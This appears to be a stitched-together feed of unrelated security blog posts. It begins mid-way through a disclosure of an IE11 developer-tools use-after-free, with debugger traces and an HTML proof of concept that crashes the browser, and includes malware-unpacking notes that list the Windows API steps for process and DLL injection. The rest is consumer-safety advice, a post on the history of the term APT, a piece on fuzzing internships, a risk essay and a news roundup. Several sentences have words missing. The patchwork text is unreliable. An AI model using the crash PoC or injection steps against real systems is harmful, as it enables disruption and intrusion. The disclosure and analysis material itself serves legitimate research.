584d8a1c     mshtml!DOMEventDebug::InvokeUnregisterCallbacks+0x100
58489f85     mshtml!CListenerAry::ReleaseAndDelete+0x42
582f6d3a     mshtml!CBase::RemoveEventListenerInternal+0x75
5848a9f7     mshtml!COmWindowProxy::RemoveEventListenerInternal+0x1a
582fb8b9     mshtml!CBase::removeEventListener+0x57
587bf1a5     mshtml!COmWindowProxy::removeEventListener+0x29
57584dae     mshtml!CFastDOM::CWindow::Trampoline_removeEventListener+0xb5
57583bb3     jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x1de
574d4492     jscript9!Js::JavascriptFunction::CallFunction<1>+0x93
[...more jscript9 functions]
581b0838     jscript9!ScriptEngineBase::Execute+0x9d
580b3207     mshtml!CJScript9Holder::ExecuteCallback+0x48
580b2fd3     mshtml!CListenerDispatch::InvokeVar+0x227
57fe5ad1     mshtml!CListenerDispatch::Invoke+0x6d
58194d17     mshtml!CEventMgr::_InvokeListeners+0x1ea
58055473     mshtml!CEventMgr::_DispatchBubblePhase+0x32
584d48aa     mshtml!CEventMgr::Dispatch+0x41e
584d387d     mshtml!CEventMgr::DispatchPointerEvent+0x1b0
5835f332     mshtml!CEventMgr::DispatchClickEvent+0x2c3
5835ce15     mshtml!CElement::Fire_onclick+0x37
583baa8e     mshtml!CElement::DoClick+0xd5
[...]

and noticed that the flow that led to the crash was:

  • An onclick handler fired due to a user input
  • The onclick handler was executed
  • removeEventListener was called

The crash happened at:

mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2+0xb:

58c0cdcd 8b9004010000    mov     edx,dword ptr [eax+104h] ds:002b:00000104=????????

Relevant commands leading to a crash:

58c0cdc7 8b411c       mov     eax, dword ptr [ecx+1Ch]
58c0cdca 8b401c       mov     eax, dword ptr [eax+1Ch]
58c0cdcd 8b9004010000 mov     edx, dword ptr [eax+104h]

Initially ecx is the “this” pointer of the called member function’s class. On the first dereference we get a zeroed region, on the second dereference we get NULL, and on the third one we crash.

Reproduction

We tried to reproduce a legit call to mshtml!CDiagnosticsElementEventHelper::OnDOMEventListenerRemoved2 to see how it looks in a non-crashing scenario. We came to the conclusion that the event is called only when the IE Developer Tools window is open with the Events tab.

We found out that when the dev tools Events tab is opened, it subscribes to events for added and removed event listeners. When the dev tools window is closed, the event consumer is freed without unsubscribing, causing a use-after-free bug which results in a null dereference crash.

Summary

Tools such as Developer Options dynamically add additional complexity to the process and may open up additional attack surfaces.

Exploitation

Even though Use-After-Free (UAF) bugs can often be exploited for arbitrary code execution, this bug is not exploitable due to MemGC mitigation. The freed memory block is zeroed, but not deallocated while other valid objects still point to it. As a result, the referenced pointer is always a NULL pointer, leading to a non-exploitable crash.

Responsible Disclosure

We reported this issue to Microsoft, that decided to not fix this UAF issue.

POC

Below is a small HTML page that demonstrates the concept and leads to a crash.
Tested IE11 version: 11.592.18362.0
Update Versions: 11.0.170 (KB4534251)

<!DOCTYPE html>
<html>
<body>
<pre>
1. Open dev tools
2. Go to Events tab
3. Close dev tools
4. Click on Enable
</pre>
<button onclick="setHandler()">Enable</button>
<button onclick="removeHandler()">Disable</button>
<p id="demo"></p>
<script>
function myFunction() {
    document.getElementById("demo").innerHTML = Math.random();
}
function setHandler() {
    document.body.addEventListener("mousemove", myFunction);
}
function removeHandler() {
    document.body.removeEventListener("mousemove", myFunction);
}
</script>
</body>
</html>

Interested in researching browser & OS bugs daily?

ZecOps is expanding. We’re looking for additional researchers to join ZecOps Research Team. If you’re interested, send us a note at careers@zecops.com

Hear the news first

  • Only essential content
  • New vulnerabilities & announcements
  • News from ZecOps Research Team
We won’t spam, pinky swear 🤞

Stay Connected and Protected During Work, School, and Play

Stay Connected and Protected During Work, School, and Play

These days, work and home mean practically the same thing. Our house is now an office space or a classroom, so that means a lot of our day-to-day happens online. We check emails, attend virtual meetings, help our children distance learn, use social media platforms to check in on our friends and family – our entire lives are digital! This increase in connectivity could mean more exposure to threats – but it doesn’t have to. That’s why this National Cybersecurity Awareness Month (NCSAM) you should learn what it means to be cyber smart.

In our third blog for this NCSAM this year, we examine what that entails. Let’s dive in.

Stay Secure While Working Remote

According to Stanford research, almost twice as many employees work from home than at the office in the U.S. in response to the COVID-19 pandemic. And this new work-from-home economy is probably only going to expand in the future. Your pets and children will continue to make surprise guest appearances on work calls, or you may continue your new job hunt from the kitchen table. But as you work on juggling your work life and personal life at home base, this doesn’t mean that you should have to juggle security threats too.

The new WFH landscape has also brought about increased risk from . Unlike corporate offices – which usually have IT staff responsible for making any necessary network security updates and patches – users’ home network security is in their own hands. This means users must ensure that their Wi-Fi connections are private and locked with a complex password or employ the help of a VPN to prevent hackers from infiltrating your work.

Be Cybersmart While Distance Learning

Work isn’t the only element of consumers’ lives that’s recently changed – school is also being conducted out of many students’ homes as they adapt to distance learning. As a result, parents are now both professionals and teachers, coaching students through new online learning obstacles. But as more students continue their curriculum from home and online activity increases, so does the possibility of exposure to inappropriate content or other threats.

For instance, the transition to distance learning has led to an increase in online students to lose valuable time meant to be spent on their education.

To help ensure that learning from home goes as smoothly as possible, parents must stay updated on the threats that could be lurking around the corner of their children’s online classrooms. Take the time to secure all the devices that power your kids’ learning with a comprehensive security solution.

Enhance Your Streaming Security

Of course, everyone needs to find a balance between work, school, and play! These days, that means scavenging the internet for new content to help keep entertained at home. In fact, according to Nielson, there was an 85% increase in American streaming rates in the first three weeks of March this year compared to March 2019 reports. However, causing users to turn to other less secure alternatives such as illegal downloads and links to “free” content riddled with malware. This could open consumers up to a whole host of threats.

Users looking to stream the latest TV show or movie should be cautious and only access entertainment content directly from a reliable source. The safest thing to do is to subscribe to a streaming site that offers the content or download the movie from credible websites, instead of downloading a “free” version from a website that could contain malware.

If You Connect It, Protect It

We all need to be cybersmart and aware of the threats that come with our lifestyle changes. By following these pointers, you can block threats from impacting your new day-to-day and ensure security is one less thing to worry about. When looking ahead to the future, incorporate the aforementioned pointers into your digital life so that you are prepared to take on whatever the evolving security landscape brings – now that’s being cybersmart!

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, look out for our other National Cybersecurity Awareness Month blogs, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

The post Stay Connected and Protected During Work, School, and Play appeared first on McAfee Blogs.

How To Spot Tech Support Scams

When something goes wrong with your computer or devices, it can cause a panic. After all, most of us depend on technology not only to work and connect with others, but also to stay on top of our daily lives. That’s why tech support scams are often successful. They appear to offer help when we need it the most. But falling for these scams can put your devices, data, and money at even greater risk.

Although support scams have been around almost as long as the internet, these threats have increased dramatically over the last couple of years, proving to be a reliable way for scammers to make a quick buck.

In fact, the Internet Crime Complaint Center (IC3) said that it received nearly 11,000 tech support related complaints in 2017, leading to losses of $15 million, 90% higher than the losses reported in 2016. Microsoft alone saw a 24% increase in tech scams reported by customers in 2017 over the previous year, with 15% of victims saying they lost money.

Often, scammers convince users that there is a problem with their computer or device by delivering pop-up error messages. These messages encourage the user to “click” to troubleshoot the problem, which can download a piece of malware onto their machine, or prompt them to buy fake security software to fix the issue. In some cases, users wind up downloading ransomware, or paying $200 to $400 for fake software to fix problems they didn’t actually have.

And, in a growing number of instances, scammers pose as legitimate technology companies, offering phony support for real tech issues. Some even promote software installation and activation for a fee, when the service is actually provided for free from the software provider. They do this by posting webpages or paid search results using the names of well-known tech companies. When a user searches for tech help, these phony services can appear at the top of the search results, tricking people into thinking they are the real deal.

Some cybercriminals have even gone so far as to advertise fake services on legitimate online forums, pretending to be real tech companies such as Apple, McAfee, and Amazon. Since forum pages are treated as quality content by search engines, these phony listings rank high in search results, confusing users who are looking for help.

The deception isn’t just online. More and more computer users report phone calls from cybercrooks pretending to be technology providers, warning them about problems with their accounts, and offering to help resolve the issue for a fee. Or worse, the scammer requests access to the victim’s computer to “fix the problem”, with the hopes of grabbing valuable data, such as passwords and identity information. All of these scams leave users vulnerable.

Here’s how to avoid support scams to keep your devices and data safe:

  • If you need help, go straight to the source—Type the address of the company you want to reach directly into the address bar of your browser—not the search bar, which can pull up phony results. If you have recently purchased software and need help, check the packaging the software came in for the correct web address or customer support line. If you are a McAfee customer, you can always reach us at https://service.mcafee.com.
  • Be suspicious—Before you pay for tech support, do your homework. Research the company by looking for other customer’s reviews. Also, check to see if your technology provider already offers the support you need for free.
  • Be wary of callers asking for personal information, especially if they reach out to you first—Situations like this happen all the time, even to institutions like the IRS. McAfee’s own policy is to answer support questions via our website only, and if users need assistance, they should reach out here directly. Never respond to unsolicited phone calls or pop-up messages, warning you about a technical issue, and never let anyone take over your computer or device remotely.
  • Surf Safe—Sometimes it can be hard to determine if search results are safe to click on, or not. Consider using a browser extension that can warn you about suspicious sites right in your search results, and help protect you even if you click on a dangerous link.
  • Keep informed—Stay up-to-date on the latest tech support scams so you know what to watch out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Spot Tech Support Scams appeared first on McAfee Blogs.

Greg Rattray Invented the Term Advanced Persistent Threat

 



I was so pleased to read this Tweet yesterday from Greg Rattray:

"Back in 2007, I coined the term “Advanced Persistent Threat” to characterize emerging adversaries that we needed to work with the defense industrial base to deal with... Since then both the APT term and the nature of our adversaries have evolved. What hasn’t changed is that in cyberspace, advanced attackers will persistently go after targets with assets they want, no matter the strength of defenses."

Background


First, some background. Who is Greg Rattray?

First, you could call him Colonel or Doctor. I will use Col as that was the last title I used with him, although these days when we chat I call him Greg. 

Col Rattray served 21 years in the Air Force and also earned his PhD in international security from Tufts University. His thesis formed the content for his 2001 book Strategic Warfare in Cyberspace, which I reviewed in 2002 and rated 4 stars. (Ouch -- I was a bit stingy with the stars back then. I was more of an operator and less of a theorist or historian in those days. Such was my bias I suppose.)

Col Rattray is also a 1984 graduate of the Air Force Academy. He studied history and political science there and returned as an assistant professor in the early 1990s. He was one of my instructors when I was a cadet there. (I graduated in 1994 with degrees in history and political science.) Col Rattray then earned a master of public policy degree at Harvard Kennedy School. (I did the same, in 1996.) 

Do you see a pattern here? He is clearly a role model. Of course, I did not stay in the Air Force as long, earn the same rank, or survive my PhD program!

After the Academy, Col Rattray served as commander of the 23rd Information Operations Squadrons on Security Hill in San Antonio, Texas. I was working in the AFCERT at the time. 

One of the last duties I had in uniform was to travel to Nellis AFB outside Las Vegas and participate in a doctrine writing project for information warfare. At the time I was not a fan of the idea, but Col Rattray convinced me someone needed to write down how we did computer network defense in the AFCERT. 

He didn't order me to participate, which I always appreciated. Years later I told him it was a good idea to organize that project and that I was probably just grumpy because of the way the Air Force personnel system had treated me at the end of my military career.

Why The Tweet Matters


For years I've had to dance around the issue of who invented the term "APT." In most narratives I say that an Air Force colonel invented the term in 2006. I based this on discussions I had with colleagues in the defense industrial base who were working with said colonel and his team from the Air Force. I did not know back then that it was Col Rattray and his team from the Air Force Information Warfare Center. 

Years later I learned of Rattray's role, but not directly from him. Only this year did Col Rattray confirm to me that he had invented the term, and that 2007 was the correct year. I encouraged him to say something, because as an historian I appreciate the value of facts and narrative. As I Tweeted after seeing Greg's Tweet:

"Security, like any other field, has HISTORY, which means there are beginnings, and stories, and discoveries, and innovators, and leaders, and first steps, and pioneers. I'm so pleased to see people like @GregRattray_ feel comfortable enough after all these years to say something."

I don't think many people in the security field think about history. Security tends to be obsessed with the "new" and the "shiny." Not enough people wonder how we got to this point, or what decisions led to the current situation. The security scene in 2020 is very different from the scene in 1960, or 1970, or 1980, or 1990, or 2000, or even 2010. This is not the time to describe how or why that is the case. I'm just glad a very important piece of the puzzle is now public.

More on the APT



If you'd like to learn more about this history of the APT, check out my newest book -- The Best of TaoSecurity Blog, Volume 2. I devote an entire chapter to blog posts and new commentary on the APT. Volume 1 arrived a few months before this new book, and I'm working on Volume 3 now.

#BeCyberSmart: Equipping Kids to Stay Safe on New Video Apps

protecting kids online

These days, spending time with friends face-to-face still isn’t always an option for teens. So, finding a fun, new app can be a little like discovering your own private beach where you can chill out, connect with friends, and be thoroughly entertained. Keeping them safe on that digital beach? That’s where parents can make a difference.

With all the popular, increasingly sophisticated video apps available, it’s easy to understand why safety ends up being the last thing on our kids’ minds. I get it. My daughter and I recently sat for hours watching Tik Tok videos and laughing until we cried.

However, October is National Cybersecurity Month and the perfect time to hit pause and talk about how to stay safe on all the apps vying for our attention.

Popular Apps to Monitor

Triller. The Triller app is a video-based platform, much like Tik Tok, that has been around since 2015. Triller has a variety of filters, and music kids can use with the videos they create.

What to monitor: Triller’s content may not always be appropriate, and because viewers can leave comments on videos, there’s a risk of cyberbullying. Also, Triller has some privacy loopholes such as data collection, location tracking, and a public account default — all of which can be modified in Settings.

HouseParty is a group video chat platform nicknamed the “Quarantine App” since its popularity increased by an additional 10 million users during the COVID lockdown. Houseparty allows users to invite friends and “friends of friends” into group video-chat sessions — much like a party. The app displays up to eight live streams on the screen at a time, creating an instant sense of community.

What to monitor. Because the app allows “friends of friends” to livestream in a group, that unknown element opens the door to a number of safety issues. Encourage kids to deny join requests from unknown people. While some users leave rooms unlocked while live streaming their party, encourage your child to use the padlock function to limit conversations to people who know each other.

Yubo. The Yubo app (formerly Yellow) is also called the “Tinder for Teens.” Kids can connect and live stream with people they know — and easily connect with people they don’t. If two users swipe right, Yubo will match them, and they can share Snapchat or Instagram names. Another app very similar to Yubo is the Hoop app.

What to monitor. Content on Yubo can be explicit and cyberbullying can arise more often since fake accounts are common. Yubo’s swipe format promotes a appearance driven match standard may not be healthy for some teens.

Byte. Another app similar to Tik Tok, Byte, features short-form videos. Byte, created by the Founders of the now defunct Vine app, lacks the filters and music of other video apps, but that’s okay; the simplicity is a plus for Byte fans.

What to monitor: Be aware of inappropriate content, cyberbullying in comments, and unknown “friends” who may be part of your child’s Byte community. Online predators have been known to reach out to kids on this app. While unwanted followers can be blocked, surprisingly, Byte doesn’t give you the ability to make your account private.

App Safety Basics

Practice personal responsibility. The theme for Cybersecurity Month 2020 is Do Your Part #BeCyberSmart. With this in mind, discuss the responsibility that comes with owning technology, be it a smartphone, a game system, a smartwatch, or any other connected device. The goal, says The National Cyber Security Alliance,

“If you connect it, protect it.”

Privacy settings. To protect privacy and keep unknown people from connecting with minors, maximize privacy Settings on each new app.

Increase safeguards. Apps can be addictive and siphon family time, study time, and sleep. A comprehensive security solution can help parents limit device time, monitor activity, and block risky content and apps.

Share wisely. Even a 15-second video shared with “close friends only” can end up in the public stream. Advise your child to only share videos or photos they’d feel good sharing with the world.

Protect personal information. Remind your child not to share private details about themselves or their family members with anyone online. This includes emails, full names, phone numbers, pet names, school names, or location.

Block and report. Talk with your child about what you consider appropriate versus inappropriate content, how to block strangers, and how to report cyberbullying and scams.

Finally, keep talking with your kids — about everything. Ultimately, it will be your consistency in having honest, ongoing dialogue with your child that will be your most valuable tool in keeping them safe online.

 

The post #BeCyberSmart: Equipping Kids to Stay Safe on New Video Apps appeared first on McAfee Blogs.

ST24: Proaktive Absicherung zur Minimierung von Endgeräterisiken (German)

Vor dem Hintergrund des IT-Fachkräftemangels gestaltet es sich für Unternehmen immer schwieriger, mit der wachsenden Zahl sowie Raffinesse von Cyber-Angriffen Schritt zu halten und drängt Sicherheitsteams dazu, oft nur noch reaktiv agieren zu können. Wie Sie mithilfe einer umfassenden Bedrohungsdatenbank sowie proaktiver Reaktionsmaßnahmen Ihre Endgerätesicherheit verbessern und Reaktionszeiten von Monaten auf Stunden verkürzen können, diskutieren wir in diesem Podcast. Hierfür zusammengekommen sind Heiko Brückle, McAfee Senior Security Engineer, sowie Chris Trynoga, McAfee Regional Solution Architect.

 

 

The post ST24: Proaktive Absicherung zur Minimierung von Endgeräterisiken (German) appeared first on McAfee Blogs.

Fuzzing internships for Open Source Software

Open source software is the foundation of many modern software products. Over the years, developers increasingly have relied on reusable open source components for their applications. It is paramount that these open source components are secure and reliable, as weaknesses impact those that build upon it.

Google cares deeply about the security of the open source ecosystem and recently launched the Open Source Security Foundation with other industry partners. Fuzzing is an automated testing technique to find bugs by feeding unexpected inputs to a target program. At Google, we leverage fuzzing at scale to find tens of thousands of security vulnerabilities and stability bugs. This summer, as part of Google’s OSS internship initiative, we hosted 50 interns to improve the state of fuzz testing in the open source ecosystem.

The fuzzing interns worked towards integrating new projects and improving existing ones in OSS-Fuzz, our continuous fuzzing service for the open source community (which has 350+ projects, 22,700 bugs, 89% fixed). Several widely used open source libraries including but not limited to nginx, postgresql, usrsctp, and openexr, now have continuous fuzzing coverage as a result of these efforts.

Another group of interns focused on improving the security of the Linux kernel. syzkaller, a kernel fuzzing tool from Google, has been instrumental in finding kernel vulnerabilities in various operating systems. The interns were tasked with improving the fuzzing coverage by adding new descriptions to syzkaller like ip tunnels, io_uring, and bpf_lsm for example, refining the interface description language, and advancing kernel fault injection capabilities.

Some interns chose to write fuzzers for Android and Chrome, which are open source projects that billions of internet users rely on. For Android, the interns contributed several new fuzzers for uncovered areas - network protocols such as pppd and dns, audio codecs like monoblend, g722, and android framework. On the Chrome side, interns improved existing blackbox fuzzers, particularly in the areas: DOM, IPC, media, extensions, and added new libprotobuf-based fuzzers for Mojo.

Our last set of interns researched quite a few under-explored areas of fuzzing, some of which were fuzzer benchmarking, ML based fuzzing, differential fuzzing, bazel rules for build simplification and made useful contributions.

Over the course of the internship, our interns have reported over 150 security vulnerabilities and 750 functional bugs. Given the overall success of these efforts, we plan to continue hosting fuzzing internships every year to help secure the open source ecosystem and teach incoming open source contributors about the importance of fuzzing. For more information on the Google internship program and other student opportunities, check out careers.google.com/students. We encourage you to apply.

Cyber Security: Three Parts Art, One Part Science

understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”

There is quite a bit of subjectivity in the cyber security business. One auditor will look at evidence and agree you are in compliance; another will say you are not. If you are going to protect sensitive information, do you encrypt it, obfuscate it, or segment it off and place it behind very tight identification and access controls before allowing users to access the data? Yes. As we advise our client base, it is essential that we have all the context necessary to make good risk-based decisions and recommendations.

Let’s talk about Connection’s artistic methodology. We start with a canvas that addresses the core components of cyber security: protection, detection, and reaction. By addressing each of these three pillars in a comprehensive way, we ensure that the full conversation around how people, process, and technology all work together to provide a comprehensive risk strategy is achieved.

Related: Cyber Security is Everyone’s Business

Protection:

People
Users understand threat and risk and know what role they play in the protection strategy. For example, if you see something, say something. Don’t let someone surf in behind you through a badge check entry. And don’t think about trying to shut off your end-point anti-virus or firewall.  In today’s remote workforce environment, good employee security awareness, especially related to phishing is essential.

Process
Policy are established, documented, and socialized. For example, personal laptops should never be connected to the corporate network. Also, don’t send sensitive information to your personal email account so you can work from home.

Technology
Some examples of the barriers used to deter attackers and breaches are edge security with firewalls, intrusion detection and prevention, sandboxing, and advanced threat detection. Security leaders need to become a student of threat, and deploy the correct technology to protect, detect, and react to threat.

Detection:

The average mean time to identify an active incident in a network is 197 days. The mean time to contain an incident is 69 days.

People
Incident response teams need to be identified and trained, and all employees need to be trained on the concept of “if you see something, say something.” Detection is a proactive process.

Process
What happens when an alert occurs? Who sees it? What is the documented process for taking action?

Technology
What is in place to ensure you are detecting malicious activity? Is it configured to ignore noise and only alert you of a real event? Will it help you bring that 197-day mean time to detection way down?

Reaction:

People
What happens when an event occurs? Who responds? How do you recover? Does everyone understand their role? Do you War Game to ensure you are prepared WHEN an incident occurs?

Process
What is the documented process to reduce the Kill Chain—the mean time to detect and contain—from 69 days to 69 minutes? Do you have a Business Continuity and Disaster Recovery Plan to ensure the ability to react to a natural disaster, significant cyber breach such as ransomware, DDoS, or—dare I say it—a pandemic?

Technology
What cyber security consoles have been deployed that allow quick access to patch a system, changing firewall rules, adjusting ACLs, or policy setting at an end point, or track a security incident through the triage process?

All of these things are important to create a comprehensive InfoSec Program. The science is the technology that will help you build a layered, in-depth defense approach. The art is how to assess the threat, define and document the risk, and create a strategy that allows you to manage your cyber risk as it applies to your environment, users, systems, applications, data, customers, supply chain, third party support partners, and business process.

More Art – Are You a Risk Avoider or Risk Transference Expert?

A better way to state that is, “Do you avoid all risk responsibility, or do you give your risk responsibility to someone else?” Hint: I don’t believe in risk avoidance or risk transference.

Yes, there is an art to risk management. There is also science if you use, for example, The Carnegie Mellon risk tools. But a good risk owner and manager documents risk, prioritizes it by risk criticality, turns it into a risk register or roadmap plan, remediates what is necessary, and accepts what is reasonable from a business and cyber security perspective. Oh, by the way, those same five cyber security professional we talked about earlier, they have 17 definitions of risk.

As we wrap up this conversation, let’s talk about the importance of selecting a risk framework. It’s kind of like going to a baseball game and recognizing the program helps you know the players and the stats. What framework will you pick? Do you paint in watercolors or oils? Are you a National Institute of Standards (NIST) artist, an Internal Standards Organization artist, or have you developed your own framework like the Nardone puzzle chart? I developed this several years ago when I was the CTO/CSO of the Commonwealth of Massachusetts. It has been artistically enhanced over the years to incorporate more security components, but it is loosely coupled on the NIST 800-53 and ISO 27001 standards.

When it comes to selecting a security framework as a CISO, I lean towards the NIST Cyber Security Framework (CSF) pictured below. This framework is comprehensive and provides a scoring model that allows risk owners to measure and target what risk level they believe they need to achieve based on their business model, threat profile, and risk tolerance. It has five functional focus areas. The ISO 27001 framework is also a very solid and frequently used model. Both of these frameworks can result in a Certificate of Attestation demonstrating adherence to the standard. Many commercial corporations do an annual ISO 27001 assessment for that very reason. More and more are leaning towards the NIST CSF, especially commercial corporations doing work with the government. Keep in mind that frameworks mature, and compliance requirements change.  For example, if you are a commercial corporation doing business with the federal government, you will need to comply with the new Cyber Security Model Certification (CMMC) soon to continue doing business with the government.

As I reflect upon my 40 years as a cyber security professional, I think of the many instances where the basic tenets of cyber security—those we think have common understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”

The post Cyber Security: Three Parts Art, One Part Science appeared first on Connected.

This Week in Security News: A Look Inside the Bulletproof Hosting Business and Amazon Prime Day Spurs Spike in Phishing, Fraud Attacks

week in security

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how cybercriminals secure their assets and survive in the business in a new Trend Micro report. Also, read about a how cybercriminals are tapping into Amazon’s Prime Day with phishing and malicious websites that are fraudulently using the Amazon brand.

Read on:

French Companies Under Attack from Clever BEC Scam

Trend Micro researchers observed a new modus operandi involving a clever BEC campaign that uses social engineering to target French companies. Malicious actors impersonated a French company in the metal fabrication industry that provides services to several organizations. They then registered a domain very similar to the legitimate one used by the business and used it to send emails to their targets. 

Amazon Prime Day Spurs Spike in Phishing, Fraud Attacks

Cybercriminals are tapping into Amazon’s annual Prime Day with researchers warning of a recent spike in phishing and malicious websites that are fraudulently using the Amazon brand. There has been a spike in the number of new monthly phishing and fraudulent sites created using the Amazon brand since August, the most significant since the COVID-19 pandemic forced people indoors in March.

CSO Insights: DataBank’s Mark Houpt on Looking Beyond Securing Infrastructures in the New Normal

The big move to working remotely wasn’t completely difficult for Mark Houpt, CISO at DataBank. After all, he has been doing so since before COVID-19. However, when the pandemic hit, DataBank, like many other companies across the globe, had to help most of their employees transition securely and smoothly to virtual work. Read up on the several important security considerations this experience highlighted.

240+ Android Apps Caught Showing Out-of-Context Ads

This summer, Google removed more than 240 Android applications from the Play Store for showing out-of-context ads and breaking a newly introduced Google policy against this type of intrusive advertising. Out-of-context ads are mobile ads that are shown outside an app’s normal container and appear as pop-ups or as full-screen ads.

Safe and Smart Connections: Securing IoT Networks for Remote Setups

As a result of our work-from-home (WFH) arrangements, there is an increased demand on networks as remote operations have created greater dependence on the IoT. Subsequently, now is a good time to re-examine the security of your network. Rather than only focusing on securing individual devices that can compromise a network, users should also secure the network to minimize threats across several devices.

Inside the Bulletproof Hosting Business

The use of underground infrastructure is inherent to the modus operandi of a cybercriminal. In Trend Micro’s Underground Hosting series, it differentiates how cybercrime goods are sold in marketplaces and what kinds of services are offered. In this final part of the Underground Hosting report series, Trend Micro explores the methods criminals employ to secure their assets and survive in the business.

Comcast Voice Remote Control Could be Turned into Spying Tool

The Comcast XR11 voice remote controller was recently found to be vulnerable and could be turned into a spying tool that eavesdrops on users. Discovered by researchers at Guardicore, the attack has been named WarezTheRemote and is said to be a very serious threat, considering that the remote is used for over 18 million devices across the U.S.

Transforming IoT Monitoring Data into Threat Defense

In the first half of 2020, there was a 70% increase in inbound attacks on devices and routers compared to the second half of 2019, which included attacks on IoT systems. To protect customers effectively by continuously monitoring trends in IoT attacks, Trend Micro examined Mirai and Bashlite (aka Qbot), two notorious IoT botnet malware types, and shares the figures relating to these botnets’ command and control (C&C) servers, IP addresses, and C&C commands.

Russia’s Fancy Bear Hackers Likely Penetrated a Federal Agency

Last week the Cybersecurity and Infrastructure Security Agency published an advisory that hackers had penetrated a US federal agency. Now, clues uncovered by a researcher at cybersecurity firm Dragos and an FBI notification to hacking victims obtained by WIRED in July suggest that it was Fancy Bear, a team of hackers working for Russia’s GRU also known as APT28.

Threat Research & XDR Combine to Stop Cybercrime

Like legitimate businesses across the globe seeking to improve their information security and protect their network infrastructure, cybercriminal businesses take similar precautions. Trend Micro Research released the final report in a series focused on this part of cybercriminal business: Underground hosting providers. Based on the report, it’s clear that understanding both the criminal business and the attacks themselves better prepares defenders and investigators to identify and eliminate threats.

Researchers Find Vulnerabilities in Microsoft Azure Cloud Service

As businesses are increasingly migrating to the cloud, securing the infrastructure has never been more important. According to research by Paul Litvak of Intezer Labs, two security flaws in Microsoft’s Azure App Services could have enabled a bad actor to carry out server-side request forgery (SSRF) attacks or execute arbitrary code and take over the administration server.

Cyber Security Awareness: A Critical Checklist

October 2020 marks the 17th year of National Cybersecurity Awareness Month, where users and organizations are encouraged to increase awareness of cybersecurity issues. To help raise awareness, Trend Micro’s Consumer Division breaks down of the security issues you should be aware of and shares tips about how you can protect yourself and your family while working, learning, or gaming at home.

The Basics of Keeping Kubernetes Cluster Secure: Worker Nodes and Related Components

In part one of this blog series, Trend Micro talked about the different ways developers can protect control plane components, including Kube API server configurations, RBAC authorization, and limitations in the communication between pods through network policies. In this second part, Trend Micro focuses on best practices that developers can implement to protect worker nodes and their components.

Are you surprised that Comcast voice activated remote controllers could be turned into a spying tool?  Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: A Look Inside the Bulletproof Hosting Business and Amazon Prime Day Spurs Spike in Phishing, Fraud Attacks appeared first on .

How To Unpack Malware: Personal Notes

Nowadays malware authors use a lot of techniques to hide malicious payloads in order to bypass security products and to make malware analyst life harder and fun. There are many tools that you can use to extract content from malware and there is not a standard process, you can use different tools, different techniques and different approaches to solve the same problem.

During this post I am going to quickly describe three (well, actually kind of four) of the main flows that takes me in succeed to unpack malware. But let me repeat that there are many ways to perform such a topic, I simply want to share some personal notes on my favorite flows, without pretending to write a full course material on how to Unpack Malware, which it worth of a full university class.

NB: there is a lot to say about packers, how they are, how they behave, there is much to say even on how many packers family are known, but this is not the place for that. What I am doing here is to mostly focusing on quick shot-cuts useful when you are on rush but not such powerful as debugging the entire process.

Method 0: Just Unpack It, I don’t care more

Well, if you are on rush and you just need to try to unpack a sample as quickest as possible, if you don’t care about what is going on, well Sergei Frankoff (@herrcore) and Sean Wilson (@seanmw) did a great job in releasing Unpac.ME. A web application that tries to unpack your sample, there is a limited free plan for using it, it works most of the times especially with known malware families

Method 1: The quick way

One of the quickest way to simply unpack malware is to try to figure out what packer has been used to pack your sample. Once you have the used packer you just need to run the relative un-packer and that’s it, you have done. Detect it Easy or bettern known as DiE would help you in performing such research. It has a wide signature database tracking hundreds different packers. The following image shows DiE spotting a simple (and very didactic, not really real) UPX packer.

Once you know it has been packed through UPX 3.91, just go and grab the used packer (in such case go to https://upx.github.io/) take the relative unpacker and run it against your original sample, you would see a new PE file.

Method 2: The slow but fun way to do !

This is my favorite method since it’s definitely faster than using debug and performing every step by yourself but quite powerful as well getting you the control of many actions happening into memory. Before going into this method you need to know the following main assumptions.

  1. The packer would performs some operations on bytes (read from external file or from the same file or taken from the network) then it will aggregate such a bytes and later on it will pass execution flow (EIP) to those bytes. We call those bytes the “payload“.
  2. Injecting control flows is the main strategy used by packers.
  3. Intercepting the injection flow will abstract us from the used packer

It is now interesting to understand how injection happens on Windows machine. Once we nailed it, we would agree that a quick way to unpack malware is just to grab content from the allocated and injected memory before the main sample (or stub) will make a change of control by passing EIP and Stack to new code.

Main Injection techniques to look for

Fortunately there are not thousands of different possibilities to inject shellcode into memory, so let take a closer look to the main ones. The most used is named process injection.

The process injection schema follows these main steps:

  • OpenProcess – The OpenProcess function returns a handle of an existing process object.
  • VirtualAllocEX – The VirtualAllocEx function is used to allocate the memory and grant the access permissions to the memory address.
  • WriteProcessMemory – The WriteProcessMemory function writes data to an area of memory in a specified process.
  • CreateRemoteThread – The CreateRemoteThread function creates a thread that runs in the virtual address space of another process.
Image from HERE

Another very used technique is the DLL Injection which follows these steps:

  • OpenProcess to Obtain the handle of the target process in which we intend to inject our DLL.
  • Find the address of the LoadLibraryA function using GetProcAddress & GetModuleHandleA functions. LoadLibraryA function is used for loading the DLL into the calling process.
  • VirtualAllocEX to allocate the memory space for the DLL path from where we will be loading the DLL.
  • WriteProcessMemory for writing the DLL path into the allocated memory space.
